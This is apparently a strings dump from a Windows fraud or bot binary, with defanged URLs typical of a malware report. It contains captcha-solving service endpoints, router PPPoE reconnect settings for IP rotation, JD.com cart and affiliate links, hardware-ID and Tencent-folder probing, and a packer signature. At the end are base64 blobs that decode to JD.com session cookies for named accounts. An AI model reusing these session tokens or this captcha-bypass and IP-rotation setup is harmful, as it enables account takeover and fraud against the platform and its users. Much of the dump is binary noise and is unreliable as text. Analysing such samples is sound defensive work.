Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Rewinding stream by : %zd bytes on url %s (zero-length body)
Operation timed out after %ld milliseconds with %lld bytes received
No URL set!
[^?&/:]://%c
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
Issue another request to this URL: '%s'
Conn: %ld (%p) Receive pipe weight: (%lld/%zu), penalized: %s
Site %s:%d is pipeline blacklisted
Server %s is blacklisted
Server %s is not blacklisted
- Conn %ld (%p) send_pipe: %zu, recv_pipe: %zu
Adding handle: recv: %d
Adding handle: send: %d
d:d
d:d:d
%s xxxxxxxxxxxxxxxx
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
%s/%s
12345678
00000001
%c%c==
%c%c%c=
0123456789-
Visual C   CRT: Not enough memory to complete call to strerror.
hXXp://api.yundama.net:5678/api.php
appkey
YDMAPI/1.0.0.6
login
report
file://%s
WLDAP32.dll
YDM_EasyReport
7%7s7}7
1014181<1@1}1
0 2=263 4
9%9s<c=
6 6$6(6,686
5$5@50686
6$7(7,7074787
0 0<0@0`0
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
VBYB_ReportError
VB_ReportError
debug.ini
ReportError:%s
Error:%s
%s|!|%s
\dms.pdb
%u%u,
dclog.txt
config.ini
port
settimeout:%d
[%d]%s
reg2:%s
checkok:%s %s
check fail:%s %s %s
check:%s %s
getcjfail:%s %s
getcj:%s %s
%s%uout
%s%uin
put img ok:%s
put img fail:%s
put img:%s %s %d
get result ok:%s,%s
get result fail:%s
get result:%s
notifyfail ok:%s
%s\%d-%s.png
notifyfail fail:%s,%s
notifyfail:%s
getimgok:%s,%s
getimg:%s
getinfo fail:%s
getinfo:%s,%s
setresult:%s,%s
HTTP/1.1 200 OK
recv:%d
send:%d
GET /ip.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
select:%d
ioctlsocket:%d
socket:%d
api.qqchaoren.net
14.17.65.24
14.17.65.23
dama2.qqchaoren.net
dama1.qqchaoren.net
connect total:%s %d
:%s %d
connect discard:%s %d
[d-d-d d:d:d](u)
recv timeout:<%d>
recvfail:<%d>%d
server close:<%d>%d
recv:<%d>%d
send:<%d>%d
sendfail:<%d>%d
connect timeout:<%d>
connectok:<%d>%s %hu
127.0.0.1
1.1.3
4-WR842N7.0.ini
LoginURL=/842N7.0
LoginPOST=null
LoginRefer=
DisconnURL=/
DisconnPOST={"network":{"change_wan_status":{"proto":"pppoe","operate":"disconnect"}},"method":"do"}
ConnURL=/
ConnPOST={"network":{"change_wan_status":{"proto":"pppoe","operate":"connect"}},"method":"do"}
ConnFlag2={"protocol":{"wan":{"wan_type":"pppoe"},"pppoe":{"username":"{username}","password":"{password}"}},"method":"set"}
.iqW>
"3/%F
QChKaS0w2IFa01xcZscPwwIRZPKKF7hneArrlg4/DqAhzueRL XnfDRQP8Qsa Le 0rAa/MF0KL7sIeVSnjfT5TBK8hHXGDRUV9ug71a1OgQZ1gIEmBukY05bNNyAk86JT1FwwA1 yQ4f3lkLoCazBqhsd5KN/UZpkgZfq4yyRfwmiruw5MHDzFasVCKtSEKlfi/Onp1dOvUJ2Ezhn9nFGY/X5t1zqfwc2GZ ohdEkiRRk4XT/XEQeHUD9KsTfOplYB0KethUTfpTaEi1JvE1ZMK3fYb gX3sdMVJnJk3lRpZJLjIuyYQiDnnFddvjHdlXvxRNJ1Sd9sal0sIqu41E2A qwsrBCpzxRLubxTF10WJLRZs9D2K16CqSsai3QEkM/ipWzgfeefD9usX6mEQkoZdJMY8qTZTyPvENOl8czSsHULfAUB8K/KUU7IpA/Ws0gaTVNqoP9UGRrSqH0nklsd7VyDtdJ7xIkDY2TeGk6ETFdqVQTQ4gVwZI7gPUC7DhKYDEOj2HR3UOtxS0UwMXFjgCGycpyAwTU/5M5AG e1n0mCA7/qPVFSs w7COnM atO5gAMu/gTcSe2E3PfmWNewGICca9LUOJBLXKIMnQJPpJdoWhCLx3KOr/0xJ7ifb593PnVSxHz/dBIEi8KLoMiTDt/CKuYMtLy uPlGsnQNxa8dG4Es9v23CeI2JCnIfshsOZZOVud6mf zFh6Q3gx1tU3vopb7sy3BKYj1 K tZFbPILPiSDj76McJWJZJF0fXTabO N7Ngfuwf2 KAi7f/x376bRdMcMYU2Du96FpP0r92b/58uOOZ4ZtPcuwDBGgfmt1ckS7tCnBKuJ4 L a2P PB7o6cLgomAbvQIbZSdZgp8oHSXwFjReZtXy9HBgMaOTwt ScjhGBao Gf/bWl2DliYHY76ht6LIfs48dbXMIziJyLB8Qzcjkh6dg6uFxRbLs3nZmB9Ci1UTO2i5oz3D r0Gkb/PGmrhEd hvA4NBXF/rhUyUSk4xc5vqU5fxKJpIBdq1v/meuSsSeKUONTmOV1PU2H2QSXYMaJHQ160Mn6DTv8ye0PTOQ/i1IVdid1Bzr9O0v 2XasQtIckeHojt83wvCZI7v4yU5BetNSrzwx3B3T38GyUtjY45t3zX7ELCVfLARoHs9JWAqm99m1G37X piHokWGVdbj63lFOudLaBoxI/YD3hBRJzBtceigH2CX820nulgXhl0opU nVnJ93jsa/YZf9AgP7PEsreu4p253a/oNl0/QMPTtc1wCaIdsD9OGP5xp3dgw8h/40gAshPj2JkJeQRJTGZF1AJRAv5Es6PNDnuE ZhEVXosLxQytBFyaMWu9WX9Mqzbs7jGsYlJCwfiBdNl85TvWPAf6Q3ZCgUpXKKB/GzwsQVGXTV8tFms3WK7fIOFO5s7hpnsPb6D2PdBzvqtL4O3WC8oXG2KXSnftvTvPb1RKDGL0NqXOVBrGuwKgWYko9fn6iiy45Th7St36T3q2L4FeTzHcWwSERb9 c8hbng5ePLDx8IhIPVgVoWUiminpY2wyarWGXQCWi0nTHCqrRM6JEK4gFgau2ZujB2v2gkmZBvEpzt/GfQ2H7W8vFxDzYIssTpM L wiShWummTI3MSMNPUARcHXMLcI SA2LuuSOqN0ti13wiS4n56iwGafngBqCN0NL9AtPapNPM4NQ==
c:\kss.ini
SetClientCertificate
MSScriptControl.ScriptControl
if (typeof Date.prototype.toJSON !== 'function') {
Date.prototype.toJSON = function (key) {
return isFinite(this.valueOf()) ?
this.getUTCFullYear()   '-'  
f(this.getUTCMonth()   1)   '-'  
f(this.getUTCDate())   'T'  
f(this.getUTCHours())   ':'  
f(this.getUTCMinutes())   ':'  
f(this.getUTCSeconds())   'Z' : null;
String.prototype.toJSON =
Number.prototype.toJSON =
Boolean.prototype.toJSON = function (key) {
return this.valueOf();
'"' : '\\"',
'\\': '\\\\'
escapable.lastIndex = 0;
return escapable.test(string) ? '"'   string.replace(escapable, function (a) {
'\\u'   ('0000'   a.charCodeAt(0).toString(16)).slice(-4);
function str(key, holder) {
// Produce a string from holder[key].
k, // The member key.
value = holder[key];
typeof value.toJSON === 'function') {
value = value.toJSON(key);
value = rep.call(holder, key, value);
if (Object.prototype.toString.apply(value) === '[object Array]') {
length = value.length;
// Join all of the elements together, separated with commas, and wrap them in
v = partial.length === 0 ? '[]' : gap ?
'[\n'   gap   partial.join(',\n'   gap)   '\n'   mind   ']' :
'['   partial.join(',')   ']';
length = rep.length;
partial.push(quote(k)   (gap ? ': ' : ':')   v);
// Otherwise, iterate through all of the keys in the object.
if (Object.prototype.hasOwnProperty.call(value, k)) {
// Join all of the member texts together, separated with commas,
v = partial.length === 0 ? '{}' : gap ?
'{\n'   gap   partial.join(',\n'   gap)   '\n'   mind   '}' :
'{'   partial.join(',')   '}';
if (typeof JSON.stringify !== 'function') {
JSON.stringify = function (value, replacer, space) {
// that can replace values, or an array of strings that will select the keys.
typeof replacer.length !== 'number')) {
throw new Error('JSON.stringify');
// Make a fake root object containing our value under the key of ''.
if (typeof JSON.parse !== 'function') {
JSON.parse = function (text, reviver) {
function walk(holder, key) {
var k, v, value = holder[key];
if (Object.prototype.hasOwnProperty.call(value, k)) {
return reviver.call(holder, key, value);
// Parsing happens in four stages. In the first stage, we replace certain
cx.lastIndex = 0;
if (cx.test(text)) {
text = text.replace(cx, function (a) {
('0000'   a.charCodeAt(0).toString(16)).slice(-4);
// We split the second stage into 4 regexp operations in order to work around
.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
.replace(/"[^"\\\n\r]*"|true|false|null|-?\d (?:\.\d*)?(?:[eE][ \-]?\d )?/g, ']')
.replace(/(?:^|:|,)(?:\s*\[) /g, ''))) {
// JavaScript structure. The '{' operator is subject to a syntactic ambiguity
// In the optional fourth stage, we recursively walk the new structure, passing
throw new SyntaxError('JSON.parse');
// These forms are obsolete. It is recommended that JSON.stringify and
// JSON.parse be used instead.
if (!Object.prototype.toJSONString) {
Object.prototype.toJSONString = function (filter) {
return JSON.stringify(this, filter);
Object.prototype.parseJSON = function (filter) {
return JSON.parse(this, filter);
JSON.stringify(
.push(
.map)'){
.splice(
) {ary=ary  key ','; }
var ary=''; for (var key in
VBScript.RegExp
&password=
&softkey=
Content-Disposition: form-data; name="password"
{pass}
Content-Disposition: form-data; name="softkey"
{softkey}
Content-Disposition: form-data; name="image"; filename="System.Byte[]"
hXXp://item.m.jd.com/product/1684485.html?pass_utm=1&&resourceType=M_APP_SAOMA
hXXp://m.jd.com
VVV.yiqifa.com ,
hXXp://p.yiqifa.com/n?k=xxxxxxxxxx&&t=hXXp://m.jd.com
hXXp://dwz.cn/1gqDyX
hXXp://VVV.51bi.com/u/fIZJfe/
Adobe Photoshop CS6 (Windows)
2015:04:04 17:49:43
urlTEXT
MsgeTEXT
hXXp://ns.adobe.com/xap/1.0/
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpTPg="hXXp://ns.adobe.com/xap/1.0/t/pg/" xmlns:stDim="hXXp://ns.adobe.com/xap/1.0/sType/Dimensions#" xmlns:xmpG="hXXp://ns.adobe.com/xap/1.0/g/" xmlns:xmpRights="hXXp://ns.adobe.com/xap/1.0/rights/" dc:format="image/jpeg" xmp:CreatorTool="Adobe Photoshop CS3 Windows" xmp:CreateDate="2015-03-18T06:27:23-08:00" xmp:ModifyDate="2015-04-04T17:49:43 08:00" xmp:MetadataDate="2015-04-04T17:49:43 08:00" xmpMM:DocumentID="uuid:203215D67ACDE4119A3791C01358868A" xmpMM:InstanceID="xmp.iid:ECEBAA42AADAE411B1E9BFB81E2C8070" xmpMM:OriginalDocumentID="uuid:203215D67ACDE4119A3791C01358868A" photoshop:LegacyIPTCDigest="00BEF17FF3A3729CC01FC79F654C4795" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpTPg:NPages="1" xmpTPg:HasVisibleTransparency="False" xmpTPg:HasVisibleOverprint="False" xmpRights:Marked="False"> <dc:title> <rdf:Alt> <rdf:li xml:lang="x-default">new Green</rdf:li> </rdf:Alt> </dc:title> <xmpMM:DerivedFrom stRef:instanceID="uuid:AEC8A14A78CDE41190D6DD5F60A0D0DC" stRef:documentID="uuid:ADC8A14A78CDE41190D6DD5F60A0D0DC"/> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:EBEBAA42AADAE411B1E9BFB81E2C8070" stEvt:when="2015-04-04T17:49:43 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:ECEBAA42AADAE411B1E9BFB81E2C8070" stEvt:when="2015-04-04T17:49:43 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpTPg:MaxPageSize stDim:w="1200.000000" stDim:h="1000.000000" stDim:unit="Pixels"/> <xmpTPg:PlateNames> <rdf:Seq> <rdf:li>Cyan</rdf:li> <rdf:li>Magenta</rdf:li> <rdf:li>Yellow</rdf:li> </rdf:Seq> </xmpTPg:PlateNames> <xmpTPg:SwatchGroups> <rdf:Seq> <rdf:li xmpG:groupName="Default Swatch Group" xmpG:groupType="0"/> </rdf:Seq> </xmpTPg:SwatchGroups> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
u]%f#7
[873271]
10|20|50
8:00-20:00
14-1114-19783
24-2144-3906
26-2951-2952
29-2580-2581
hXXp://pan.baidu.com/s/1mgkyEbY
[3819916:675971,1398976]
.nfH-
* ;.ggy
wd.cfC
Y2 r7.GQ
wEË
QB.od
(-l}@
hXXp://cart.jd.com/cart/addToCart.html?rcd=1&pid=1480390408_1520813958_1532486013&rid=1430806104479
2015:05:05 13:09:00
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmp:CreateDate="2015-05-05T13:04 08:00" xmp:ModifyDate="2015-05-05T13:09 08:00" xmp:MetadataDate="2015-05-05T13:09 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:04EF9FC2E0F2E411B346F97AECF82ED5" xmpMM:DocumentID="xmp.did:03EF9FC2E0F2E411B346F97AECF82ED5" xmpMM:OriginalDocumentID="xmp.did:03EF9FC2E0F2E411B346F97AECF82ED5"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:03EF9FC2E0F2E411B346F97AECF82ED5" stEvt:when="2015-05-05T13:04 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)"/> <rdf:li stEvt:action="converted" stEvt:parameters="from image/png to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:04EF9FC2E0F2E411B346F97AECF82ED5" stEvt:when="2015-05-05T13:09 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
.akH"
.lCj:
B#Xn.mR6-^
t-j}e/
.HDF3
ZO,%c
I:\<r
hXXp://item.jd.com/1250128.html
1250128
[1848484:595936,1276440]
hXXp://VVV.jd.com/suit/show.html?suitId=1848484&skuIds=595936,1276440
[1848484:::595936,1276440]
'/.Wj
_".Sq0
30000000000
10000000000
OQ^^.FE:rDA
o.Sqw
60000000000
9*.ihd
fúd
5444444444
04444444444
44444444
bU.Yn
54444444
\.SW`
.vH$K
).iN'
C%9?
mi?x%XxY
8 _%d
.MQol
Q.Ms2
 L.cC
%d&&'
00003333
?456789:;<=
!"#$%&'()* ,-./0123
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
MSH_SCROLL_LINES_MSG
JOIN
MSWHEEL_ROLLMSG
__MSVCRT_HEAP_SELECT
iphlpapi.dll
MPR.dll
VERSION.dll
.PAVCException@@
;Driver={Microsoft Access Driver (*.mdb)};FIL=MS Access
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
ExecuteSql
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
libpng warning: %s
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
;3 #>6.&
'2, / 0&7!4-)1#
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
Excel.Application
BDGetColSQLType
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
.PAVCDBException@@
right-curly-bracket
left-curly-bracket
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
Ks.yw
hid.dll
mscoree.dll
mscorwks.dll
mscorsvr.dll
KernelBase.dll
mscoreei.dll
clr.dll
diasymreader.dll
SEGetNumExecUsed
SEGetNumExecLeft
SESetNumExecUsed
SEGetExecTimeUsed
SEGetExecTimeLeft
SESetExecTime
SEGetTotalExecTimeUsed
SEGetTotalExecTimeLeft
SESetTotalExecTime
SECheckExecTime
SECheckTotalExecTime
&&&&6666????
""""****
2222::::
$$$$\\\\
00006666
####====
PSAPI.DLL
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
z'{%f
Ó`O9
%fV~;
3%.Wag$
/t.Cn f
VJu.Fhs'
>\.rS
Ksûf
_PZs.RI
S M%d<u&
K%u-g
p%%uR
CP%u^
ACwM.dy
Tn%Cm
@M(%u8I
M.Yn?
do.rj
}T%d(
.Act\
qudP
WINMM.dll
WINSPOOL.DRV
RASAPI32.dll
ODBC32.dll
oledlg.dll
comdlg32.dll
D$.fP
DRASAPI32.dll
WinExec
OWINMM.dll
1WS2_32.dll
6KERNEL32.dll
.DPtoLP
'GetCPInfo
GetWindowsDirectoryA
CreateIoCompletionPort
UnhookWindowsHookEx
EnumChildWindows
SetWindowsHookExA
GetKeyState
CreateDialogIndirectParamA
GetViewportExtEx
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
~ISetViewportExtEx
ScaleViewportExtEx
(KShellExecuteA
InternetCanonicalizeUrlA
InternetCrackUrlA
CWLDAP32.dll
Safengine Shielden v2.3.8.0
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
xxxxxx
hXXp://proxy.mimidama.net:
hXXp://proxy.mimidama.com:
&ID=%d&sid=%s&skey=
/Upload/MMReportError.aspx?key=
&id=%d
/Upload/MMResult.aspx?key=
/Service/TSServerConfig.aspx
hXXp://common2.mimidama.com:
hXXp://common1.mimidama.com:
hXXp://common.mimidama.com:
1.0.0.5
/Upload/Processing.aspx
/Upload/MMLogin.aspx?U=
mimiKEY
UKEY
/Service/MMReg.aspx
pkey
/Service/Pay.aspx
/Upload/MMGetPoint.aspx?U=
ID/KEY/
/Upload/MMProcessing.aspx
ByTypeBytes.JPG
%d-%d-%d
User-Agent:WiseClient-1.0.0.5;
WiseClient-1.0.0.5
&random=xxxxxxxxxxx-ddddddd
ServerPort
Config.ini
-:-:-.%d
tCRYPTDLL.DLL
\\.\PHYSICALDRIVE0
hXXp://iframe.ip138.com/ic.asp
Microsoft Windows Millennium Edition
Microsoft Windows 98
Microsoft Windows 95
%s (Build %d)
Service Pack 6a (Build %d)
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
Web Edition
Service Pack %d (Build %d)
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003,
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 "R2"
Windows Server 2008
Windows Vista
Windows Server 2008 R2
Windows 7
ox-x-x-x-x-x
\Tencent\Users\*.*
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
kuoda(mimidama.com)
1, 0, 0, 5
2,3,1,1208
yadinae@qq.com
*\G{000204EF-0000-0000-C000-000000000046}#4.0#9#C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL#Visual Basic For Applications
*\G{4AFFC9A0-5F99-101B-AF4E-00AA003F0F07}#9.0#0#%Program Files%\Microsoft Office\OFFICE11\MSACC.OLB#Microsoft Access 11.0 Object Library
*\G{00025E01-0000-0000-C000-000000000046}#5.0#0#%Program Files%\Common Files\Microsoft Shared\DAO\DAO
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#%WinDir%\System32\STDOLE2.TLB#OLE Automation
Cmdbars
Reports
*\G{00025E01-0000-0000-C000-000000000046}#5.0#0#%Program Files%\Common Files\Microsoft Shared\DAO\DAO360.DLL#Microsoft DAO 3.6 Object Library
88888888886
22222222220
44444444442
-0010-8000-00AA006D2EA4}#2.1#0#%Program Files%\Common Files\System\ado\msado21.tlb#Microsoft ActiveX Data Objects 2.1 Library
*\G{000204EF-0000-0000-C000-000000000046}#4.0#9#C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL#Visual Basic For Applications
*\G{4AFFC9A0-5F99-101B-AF4E-00AA003F0F07}#9.0#0#%Program Files% (x86)\Microsoft Office\OFFICE11\MSACC.OLB#Microsoft Access 11.0 Object Library
*\G{00000201-0000-0010-8000-00AA006D2EA4}#2.1#0#%Program Files%\Common Files\System\ado\msado21.tlb#Microsoft ActiveX Data Objects 2.1 Library
Auto Compact"Show Values Limit,Show Values in Indexed4Show Values in Non-Indexed*Show Values in Remote.Show Values in Snapshot*Show Values in Server(Themed Form Controls.Use Default Page Folder&Default Page Folder6Use Default Connection File.Default Connection File
PrimaryKey
X3BzdD15YW5nZ3VhMDQ0NzYxO1RyYWNrSUQ9MU1XWmJjVXdxMUFhMVFHekNBbk96TlMwZDBLcEJrUWhEYjBHNWRnenJGUEk3Ulg5VHJQRjBsTDQzUXpQcjdoTlJ3N2lEVE1tTmRZLXRNUVlEb1BFVzlnO3BpbklkPVBoMlNHdWkyUzNPQ2t0LTJjRmJGdkE7cGluPXlhbmdndWEwNDQ3NjE7bG9naW5pbmc9MTt1bmljaz15YW5nZ3VhMDQ0NzYxO2xpZ2h0aW5nPUVBMEZBQzM0OUZDODMxMDM2RUE3NkEwN0I2OTAzQ0Q4ODRCQUMxODRCNzNDNTcwQjY0QzIwQUJCNkQ1OUJFNUE3QjUwOUNDOUI1MjJGRkFBMTlENjhGQ0YwM0U4QjA5NTQxMDc5NzREOUI3RDMzQTQzRDIzNDIxMEVGNTU5RkVBNkZEOURBMkFDN0MzQTcwOTY0MjcxMjhFQURENzA0NUMxNTVENzcyRDE3NTk0NUEyMjA0MjJENjJDQjY3MzYyMEEyQzU3NzRCNjNGNDNDRUY1MEI5NENCOERCMjRFNURDQjdDRDMyOUM1OTk5MzQ1MDRCN0FGQTY4MERDREU2MDA5RDNCQ0QwODU0OUNDNkJCNUNCODA0MjNGNERCMTU1NDt0aG9yPUFGQUYyRERFRjk5RUZEQjkxMTBFRjA5RUE5ODkzQzY0QjNFN0U0RjAwQURDOTYwQkU4Qzk3OERFRjMyMUREOUE0NjEyMDc0Nzk3MTczNjA1NjE1OUU2QUVBMzYzNTlDNEM0QzM3RDdENjg5RkVCRTgwMDgyQkE4MUM3OTFBOTAyMEI2MUJCRDg5RDk2RDNBQUNDRjZFNDExREQyQzQwNkEwNzQxQjM2MjY3NzI3OTg0NDcxNjQ3NzFFMzQxRkIzNjk0RjA4NDkxRkVBQkU0RUI2MjM2MTVENDJDRTlBMDFBNDBEOEY2NzE3RTZGODgyRThFQzRCQUFBNUFCM0IxNjIyREFEMzc3RjhBQjNCQ0EyRTc5RkZGQ0NEQjVBODFEMjtvbD0xO190cD1yT3clMkI5cGt1ak5zTlVLUG9ZWnppNHclM0QlM0Q7
X3BzdD0lRTclQTElODAlRTglQjglOEYlRTYlOEMlQTglRTUlODElQjclRTUlOEIlQkU7VHJhY2tJRD0xWWo3eG5TRDQ2WDF4YzhDay1zU1ExTVp2bzRobE45YTEyMWpqSTR6UVVSRzFhMEpWeTM1dnlEeXlzOUlSZkYyMkZNT2pzM214clBqenV5TWMxUW1XLTh2ZnFFbEVSd3hzeVpYYlBnRHBwaHhpNG9tUmx6YXROY2E4WXM2V3pyM047cGluSWQ9UzZkbG5NUXZ0Tk1oSlBULTQtek56QTttcD0lRTclQTElODAlRTglQjglOEYlRTYlOEMlQTglRTUlODElQjclRTUlOEIlQkU7cGluPSVFNyVBMSU4MCVFOCVCOCU4RiVFNiU4QyVBOCVFNSU4MSVCNyVFNSU4QiVCRTtsb2dpbmluZz0xO3VuaWNrPWhlc2h1aWh1YWxlO2xpZ2h0aW5nPUU0QUNFMDdBMUIxQTMzQ0YyOTY5RTI0QjM0RUJDRDU4ODUzMEE2ODM0N0U4RUU1OTk3NEUzQUJEMTEzNkM0N0M0MEU0RDhGQTU3QjRCOTdEOTcxMzRGOUQ1RjY5ODUwNjlCRTI1NjRCNUYzMzc3NTI1Mjg2ODc0OEMyMzU3RjI3NDk0QzVENEZGMERENzAzREUwRTc4MkZGOTZCNTEyODdFMTE4Nzc1RjNGRTkyM0E4RjFBQTYxMUU5QTBFN0VGQkIyNDA2NDRDNjdFOTVDRDQ1OTQ0M0RGNzc1ODU5RTMwQTU5NUExNUQwODk4NzUxMkQxNDU4MzBCQzRFNjMwRjI7dGhvcj1DRDU0RkJFRjc4NEQyMTlBQjQzOURDREI2RkREMTc3QTQzRDdFREIwNzA1QkZFMjI0RDIzRUQwMkJBRUY5RDE1OTcxNzU0MDk0MjdENUFFMjQ4MUFEN0NCRTlBQjIxRTdGMzFEQTkzQTBENzZGRTJGMjZCQjE4NUIzODcyMzZFQzE0RUJFMzA4RjYxNDE5Q0IzRUM2Qzg4OUE4RDI2NjgxMjFCQzk4MjNCRkQ1MDhERjNGRjJFRDU5RTQ3ODA0ODVBQUM0MTAwMDM3QjFGODFGMkMzRjY3MEYxQzUxMzMxMzRFMjNCM0E3ODg4MjkzNTA1MEFGQzJBRUIyQ0Q2MUMwO29sPTE7X3RwPWdqSTVPdnJkWmI3bXRHbklOTCUyRldDdUI3UUtXWnNmVGZCb0tENFclMkZMd0xxd1FjSnZCZzEzbG9NZXVYRjRmQXBpOw==
X3BzdD1kYW5namk2OTM2ODA7VHJhY2tJRD0xQUwyVjdsWWQ0RTRNTVVnY2VuQW5zczl0NDVsREdWX0prNDFpUDlPYnZQbFJ0UVBicFhqdnFQcDZVUTRsclctSE13emE5OXQ5SE1NU3E5TEpyR2s1QlE7cGluSWQ9UnAtQlZuUllscTV2TmtmcnFVU3dVQTtwaW49ZGFuZ2ppNjkzNjgwO2xvZ2luaW5nPTE7dW5pY2s9ZGFuZ2ppNjkzNjgwO2xpZ2h0aW5nPTM5RDJBQUFGODhFRDczQUMyNjJDQjFBNTBBMThBRTlEQzZBQTE1ODM0OTNCOUQxQjJFMTBGQ0U1QTA3NzUyQzVFRjExMjc3MjY3RjAxQzQzNjNDRjg5NTU4NUUwNzA5QjdENDNEMzVCMzVCNDlFMkE2QUE5MzI1RDc3MDI5RTBENUQ5QUREMjYwNTFCODEzRUEwMUVGNTVGOEM3N0MyMzNGQTQ1NjI3REE2NEI4QjgwODU5NkZDNTIzQkUzMDUyMzA2N0NBNkJCODUwODcyQTQxODA3NzdBNzZCRTMxRENDRDY2ODNGNEMzRkRGQTUwODk0OUJDNjQ5NDFGNzc2N0JFMTJGMTFCN0VEMzk1MDdEOEY3OUE4RUQ4NzlEMDYxRjt0aG9yPTMwNUNERTIwMkNDQkQwMkY0OTRDOTQxQjg2N0ZBNzdEQ0QxODRDQzg2M0U2MDg0QjNGODY2QjdDMzVCMzMyMzU1NzM1MzRENTI1M0NDNUQ1MEIxQzQ1NjU5QjEwMDNGMEJFNEU4MzUyOUFDQ0E2NDA4QzNEQjYwMkJDMzNFRjU3M0ZFNTM5OTYzMEJGOEI4Q0JCRkM0OENGQjAxMzVCRjQ0NDk1QTlERjFFRjE5NDMzNjEyNTMyRjIz